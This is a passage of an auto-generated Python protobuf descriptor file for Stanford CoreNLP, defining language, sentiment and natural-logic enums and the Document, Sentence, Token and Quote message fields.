\x03(\t*\x8d\x01\n\x08Language\x12\x0b\n\x07Unknown\x10\x00\x12\x07\n\x03\x41ny\x10\x01\x12\n\n\x06\x41rabic\x10\x02\x12\x0b\n\x07\x43hinese\x10\x03\x12\x0b\n\x07\x45nglish\x10\x04\x12\n\n\x06German\x10\x05\x12\n\n\x06\x46rench\x10\x06\x12\n\n\x06Hebrew\x10\x07\x12\x0b\n\x07Spanish\x10\x08\x12\x14\n\x10UniversalEnglish\x10\t*h\n\tSentiment\x12\x13\n\x0fSTRONG_NEGATIVE\x10\x00\x12\x11\n\rWEAK_NEGATIVE\x10\x01\x12\x0b\n\x07NEUTRAL\x10\x02\x12\x11\n\rWEAK_POSITIVE\x10\x03\x12\x13\n\x0fSTRONG_POSITIVE\x10\x04*\x93\x01\n\x14NaturalLogicRelation\x12\x0f\n\x0b\x45QUIVALENCE\x10\x00\x12\x16\n\x12\x46ORWARD_ENTAILMENT\x10\x01\x12\x16\n\x12REVERSE_ENTAILMENT\x10\x02\x12\x0c\n\x08NEGATION\x10\x03\x12\x0f\n\x0b\x41LTERNATION\x10\x04\x12\t\n\x05\x43OVER\x10\x05\x12\x10\n\x0cINDEPENDENCE\x10\x06\x42*\n\x19\x65\x64u.stanford.nlp.pipelineB\rCoreNLPProtos')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_LANGUAGE = _descriptor.EnumDescriptor(
name='Language',
full_name='edu.stanford.nlp.pipeline.Language',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Unknown', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Any', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Arabic', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Chinese', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='English', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='German', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='French', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hebrew', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Spanish', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UniversalEnglish', index=9, number=9,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=7344,
serialized_end=7485,
)
_sym_db.RegisterEnumDescriptor(_LANGUAGE)
Language = enum_type_wrapper.EnumTypeWrapper(_LANGUAGE)
_SENTIMENT = _descriptor.EnumDescriptor(
name='Sentiment',
full_name='edu.stanford.nlp.pipeline.Sentiment',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='STRONG_NEGATIVE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WEAK_NEGATIVE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEUTRAL', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WEAK_POSITIVE', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='STRONG_POSITIVE', index=4, number=4,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=7487,
serialized_end=7591,
)
_sym_db.RegisterEnumDescriptor(_SENTIMENT)
Sentiment = enum_type_wrapper.EnumTypeWrapper(_SENTIMENT)
_NATURALLOGICRELATION = _descriptor.EnumDescriptor(
name='NaturalLogicRelation',
full_name='edu.stanford.nlp.pipeline.NaturalLogicRelation',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='EQUIVALENCE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORWARD_ENTAILMENT', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='REVERSE_ENTAILMENT', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEGATION', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ALTERNATION', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='COVER', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INDEPENDENCE', index=6, number=6,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=7594,
serialized_end=7741,
)
_sym_db.RegisterEnumDescriptor(_NATURALLOGICRELATION)
NaturalLogicRelation = enum_type_wrapper.EnumTypeWrapper(_NATURALLOGICRELATION)
Unknown = 0
Any = 1
Arabic = 2
Chinese = 3
English = 4
German = 5
French = 6
Hebrew = 7
Spanish = 8
UniversalEnglish = 9
STRONG_NEGATIVE = 0
WEAK_NEGATIVE = 1
NEUTRAL = 2
WEAK_POSITIVE = 3
STRONG_POSITIVE = 4
EQUIVALENCE = 0
FORWARD_ENTAILMENT = 1
REVERSE_ENTAILMENT = 2
NEGATION = 3
ALTERNATION = 4
COVER = 5
INDEPENDENCE = 6
_DOCUMENT = _descriptor.Descriptor(
name='Document',
full_name='edu.stanford.nlp.pipeline.Document',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='text', full_name='edu.stanford.nlp.pipeline.Document.text', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentence', full_name='edu.stanford.nlp.pipeline.Document.sentence', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='corefChain', full_name='edu.stanford.nlp.pipeline.Document.corefChain', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='docID', full_name='edu.stanford.nlp.pipeline.Document.docID', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='docDate', full_name='edu.stanford.nlp.pipeline.Document.docDate', index=4,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='calendar', full_name='edu.stanford.nlp.pipeline.Document.calendar', index=5,
number=8, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentencelessToken', full_name='edu.stanford.nlp.pipeline.Document.sentencelessToken', index=6,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quote', full_name='edu.stanford.nlp.pipeline.Document.quote', index=7,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentions', full_name='edu.stanford.nlp.pipeline.Document.mentions', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=True,
extension_ranges=[(100, 256), ],
oneofs=[
],
serialized_start=45,
serialized_end=407,
)
_SENTENCE = _descriptor.Descriptor(
name='Sentence',
full_name='edu.stanford.nlp.pipeline.Sentence',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='token', full_name='edu.stanford.nlp.pipeline.Sentence.token', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenOffsetBegin', full_name='edu.stanford.nlp.pipeline.Sentence.tokenOffsetBegin', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenOffsetEnd', full_name='edu.stanford.nlp.pipeline.Sentence.tokenOffsetEnd', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.Sentence.sentenceIndex', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='characterOffsetBegin', full_name='edu.stanford.nlp.pipeline.Sentence.characterOffsetBegin', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='characterOffsetEnd', full_name='edu.stanford.nlp.pipeline.Sentence.characterOffsetEnd', index=5,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='parseTree', full_name='edu.stanford.nlp.pipeline.Sentence.parseTree', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='binarizedParseTree', full_name='edu.stanford.nlp.pipeline.Sentence.binarizedParseTree', index=7,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='annotatedParseTree', full_name='edu.stanford.nlp.pipeline.Sentence.annotatedParseTree', index=8,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentiment', full_name='edu.stanford.nlp.pipeline.Sentence.sentiment', index=9,
number=33, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='kBestParseTrees', full_name='edu.stanford.nlp.pipeline.Sentence.kBestParseTrees', index=10,
number=34, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='basicDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.basicDependencies', index=11,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='collapsedDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.collapsedDependencies', index=12,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='collapsedCCProcessedDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.collapsedCCProcessedDependencies', index=13,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='alternativeDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.alternativeDependencies', index=14,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='openieTriple', full_name='edu.stanford.nlp.pipeline.Sentence.openieTriple', index=15,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='kbpTriple', full_name='edu.stanford.nlp.pipeline.Sentence.kbpTriple', index=16,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entailedSentence', full_name='edu.stanford.nlp.pipeline.Sentence.entailedSentence', index=17,
number=15, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enhancedDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.enhancedDependencies', index=18,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enhancedPlusPlusDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.enhancedPlusPlusDependencies', index=19,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='paragraph', full_name='edu.stanford.nlp.pipeline.Sentence.paragraph', index=20,
number=11, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='text', full_name='edu.stanford.nlp.pipeline.Sentence.text', index=21,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasRelationAnnotations', full_name='edu.stanford.nlp.pipeline.Sentence.hasRelationAnnotations', index=22,
number=51, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entity', full_name='edu.stanford.nlp.pipeline.Sentence.entity', index=23,
number=52, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relation', full_name='edu.stanford.nlp.pipeline.Sentence.relation', index=24,
number=53, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasNumerizedTokensAnnotation', full_name='edu.stanford.nlp.pipeline.Sentence.hasNumerizedTokensAnnotation', index=25,
number=54, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentions', full_name='edu.stanford.nlp.pipeline.Sentence.mentions', index=26,
number=55, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionsForCoref', full_name='edu.stanford.nlp.pipeline.Sentence.mentionsForCoref', index=27,
number=56, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasCorefMentionsAnnotation', full_name='edu.stanford.nlp.pipeline.Sentence.hasCorefMentionsAnnotation', index=28,
number=57, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceID', full_name='edu.stanford.nlp.pipeline.Sentence.sentenceID', index=29,
number=58, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=True,
extension_ranges=[(100, 256), ],
oneofs=[
],
serialized_start=410,
serialized_end=1925,
)
_TOKEN = _descriptor.Descriptor(
name='Token',
full_name='edu.stanford.nlp.pipeline.Token',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='word', full_name='edu.stanford.nlp.pipeline.Token.word', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pos', full_name='edu.stanford.nlp.pipeline.Token.pos', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.Token.value', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='category', full_name='edu.stanford.nlp.pipeline.Token.category', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='before', full_name='edu.stanford.nlp.pipeline.Token.before', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after', full_name='edu.stanford.nlp.pipeline.Token.after', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='originalText', full_name='edu.stanford.nlp.pipeline.Token.originalText', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ner', full_name='edu.stanford.nlp.pipeline.Token.ner', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normalizedNER', full_name='edu.stanford.nlp.pipeline.Token.normalizedNER', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lemma', full_name='edu.stanford.nlp.pipeline.Token.lemma', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='beginChar', full_name='edu.stanford.nlp.pipeline.Token.beginChar', index=10,
number=11, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endChar', full_name='edu.stanford.nlp.pipeline.Token.endChar', index=11,
number=12, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='utterance', full_name='edu.stanford.nlp.pipeline.Token.utterance', index=12,
number=13, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='speaker', full_name='edu.stanford.nlp.pipeline.Token.speaker', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='beginIndex', full_name='edu.stanford.nlp.pipeline.Token.beginIndex', index=14,
number=15, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endIndex', full_name='edu.stanford.nlp.pipeline.Token.endIndex', index=15,
number=16, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenBeginIndex', full_name='edu.stanford.nlp.pipeline.Token.tokenBeginIndex', index=16,
number=17, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenEndIndex', full_name='edu.stanford.nlp.pipeline.Token.tokenEndIndex', index=17,
number=18, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timexValue', full_name='edu.stanford.nlp.pipeline.Token.timexValue', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasXmlContext', full_name='edu.stanford.nlp.pipeline.Token.hasXmlContext', index=19,
number=21, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='xmlContext', full_name='edu.stanford.nlp.pipeline.Token.xmlContext', index=20,
number=22, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='corefClusterID', full_name='edu.stanford.nlp.pipeline.Token.corefClusterID', index=21,
number=23, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='answer', full_name='edu.stanford.nlp.pipeline.Token.answer', index=22,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headWordIndex', full_name='edu.stanford.nlp.pipeline.Token.headWordIndex', index=23,
number=26, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='operator', full_name='edu.stanford.nlp.pipeline.Token.operator', index=24,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='polarity', full_name='edu.stanford.nlp.pipeline.Token.polarity', index=25,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='span', full_name='edu.stanford.nlp.pipeline.Token.span', index=26,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentiment', full_name='edu.stanford.nlp.pipeline.Token.sentiment', index=27,
number=30, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quotationIndex', full_name='edu.stanford.nlp.pipeline.Token.quotationIndex', index=28,
number=31, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='conllUFeatures', full_name='edu.stanford.nlp.pipeline.Token.conllUFeatures', index=29,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coarseTag', full_name='edu.stanford.nlp.pipeline.Token.coarseTag', index=30,
number=33, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='conllUTokenSpan', full_name='edu.stanford.nlp.pipeline.Token.conllUTokenSpan', index=31,
number=34, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='conllUMisc', full_name='edu.stanford.nlp.pipeline.Token.conllUMisc', index=32,
number=35, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='conllUSecondaryDeps', full_name='edu.stanford.nlp.pipeline.Token.conllUSecondaryDeps', index=33,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='wikipediaEntity', full_name='edu.stanford.nlp.pipeline.Token.wikipediaEntity', index=34,
number=37, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='gender', full_name='edu.stanford.nlp.pipeline.Token.gender', index=35,
number=51, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='trueCase', full_name='edu.stanford.nlp.pipeline.Token.trueCase', index=36,
number=52, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='trueCaseText', full_name='edu.stanford.nlp.pipeline.Token.trueCaseText', index=37,
number=53, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=True,
extension_ranges=[(100, 256), ],
oneofs=[
],
serialized_start=1928,
serialized_end=2940,
)
_QUOTE = _descriptor.Descriptor(
name='Quote',
full_name='edu.stanford.nlp.pipeline.Quote',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='text', full_name='edu.stanford.nlp.pipeline.Quote.text', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='begin', full_name='edu.stanford.nlp.pipeline.Quote.begin', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='end', full_name='edu.stanford.nlp.pipeline.Quote.end', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceBegin', full_name='edu.stanford.nlp.pipeline.Quote.sentenceBegin', index=3,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceEnd', full_name='edu.stanford.nlp.pipeline.Quote.sentenceEnd', index=4,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenBegin', full_name='edu.stanford.nlp.pipeline.Quote.tokenBegin', index=5,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenEnd', full_name='edu.stanford.nlp.pipeline.Quote.tokenEnd', index=6,
number=8, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='docid', full_name='edu.stanford.nlp.pipeline.Quote.docid', index=7,
